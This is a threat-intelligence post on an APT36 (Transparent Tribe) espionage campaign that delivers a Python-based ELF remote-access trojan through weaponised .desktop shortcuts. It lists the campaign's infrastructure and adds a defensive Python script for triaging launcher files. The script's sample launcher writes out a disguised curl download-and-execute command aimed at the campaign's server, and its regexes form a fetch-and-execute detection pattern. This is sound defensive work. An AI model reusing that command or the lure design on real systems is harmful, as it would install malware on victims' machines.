CYFIRMA Research
Cyber defenders, listen up! The CYFIRMA Research podcast has some juicy intel on the latest cyber threats that are lurking in the shadows. Tune in to this security briefing to stay on top of emerging threats and be ready to tackle digital risk like never before.
CYFIRMA Research- APT36 Python Based ELF Malware Targeting Indian Government Entities
APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.
CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors.
This campaign showcases a major leap in the group’s technical sophistication — delivering custom Python-based ELF malware through weaponized .desktop shortcut files distributed via spear-phishing.
📌 Key Highlights:
The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.
Once executed, the shortcut downloads:
A decoy PDF to distract the user
A malicious ELF payload (swcbc)
A persistence-enabling shell script (swcbc.sh)
The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.
Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36’s ongoing espionage operations.
The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.
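The highlights above describe a launcher-file lure: a .desktop shortcut that looks like a document but, when opened, fetches and runs payloads. As an added, defender-side example (not code from CYFIRMA's report), the script below triages .desktop files for that pattern. It parses the [Desktop Entry] section, flags Exec lines that both download from the network and execute something, flags launchers that masquerade as documents, and matches contacted hosts against the two indicators published on this page. The heuristics, the hidden-file name and the two sample launchers are constructed for illustration and are assumptions, not details from the report.

```python
"""Triage heuristics for Linux .desktop launcher files (added example, not CYFIRMA code)."""
import re
from configparser import ConfigParser, Error as ConfigError

# Infrastructure published on this page, normalised from the defanged form.
IOC_HOSTS = {"lionsdenim.xyz", "185.235.137.90"}

# Heuristic patterns (assumed here, not taken from the report): a weaponised
# launcher typically fetches from the network and then executes the result.
FETCH_RE = re.compile(r"\b(curl|wget)\b", re.I)
EXEC_RE = re.compile(r"(\bchmod\s+\+x\b|\b(ba)?sh\s+-c\b|\|\s*(ba)?sh\b|\bpython3?\b)", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.\[\]-]+)", re.I)
DOC_RE = re.compile(r"\.(pdf|docx?|xlsx?)\b", re.I)


def refang(host: str) -> str:
    """Turn a defanged host such as example[.]xyz back into its plain form."""
    return host.replace("[.]", ".").lower()


def parse_desktop(text: str) -> dict:
    """Return the [Desktop Entry] section as a dict (keys keep their case), or {} if unparseable."""
    cp = ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.optionxform = str  # keep "Exec", "Name", "Icon" as written in the file
    try:
        cp.read_string(text)
    except ConfigError:
        return {}
    if not cp.has_section("Desktop Entry"):
        return {}
    return dict(cp.items("Desktop Entry"))


def triage_desktop(text: str) -> list:
    """Return a list of findings for one .desktop file; an empty list means nothing suspicious."""
    entry = parse_desktop(text)
    if not entry:
        return ["unparseable .desktop file"]

    findings = []
    exec_line = entry.get("Exec", "")
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")

    # 1. Known infrastructure referenced from the Exec line.
    hosts = {refang(h) for h in URL_RE.findall(exec_line)}
    hits = hosts & IOC_HOSTS
    if hits:
        findings.append("Exec contacts known APT36 infrastructure: " + ", ".join(sorted(hits)))

    # 2. Download-then-execute behaviour in a launcher.
    if FETCH_RE.search(exec_line) and EXEC_RE.search(exec_line):
        findings.append("Exec fetches content from the network and executes it")
    elif FETCH_RE.search(exec_line):
        findings.append("Exec downloads content from the network")

    # 3. Launcher dressed up as a document (name or icon suggests a PDF/Office file).
    if DOC_RE.search(name) or DOC_RE.search(icon) or re.search(r"pdf", icon, re.I):
        findings.append("launcher masquerades as a document")

    # 4. Shell command that runs without a visible terminal.
    if entry.get("Terminal", "").lower() == "false" and "sh -c" in exec_line:
        findings.append("shell command runs with Terminal=false (hidden from the user)")

    return findings


# Constructed sample launchers for a local dry run (not files from the campaign).
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
Terminal=false
"""

SUSPICIOUS = """[Desktop Entry]
Type=Application
Name=Meeting_Notes.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -s http://185.235.137.90/swcbc -o /tmp/.swcbc && chmod +x /tmp/.swcbc && /tmp/.swcbc"
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspicious", SUSPICIOUS)):
        print(label, "->", triage_desktop(sample) or ["no findings"])
```

Run over a directory of downloaded or e-mailed .desktop files, the script gives a quick first cut; anything with two or more findings deserves a closer look at the Exec line and at what it reaches out to.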
Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA
#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagement
https://www.cyfirma.com/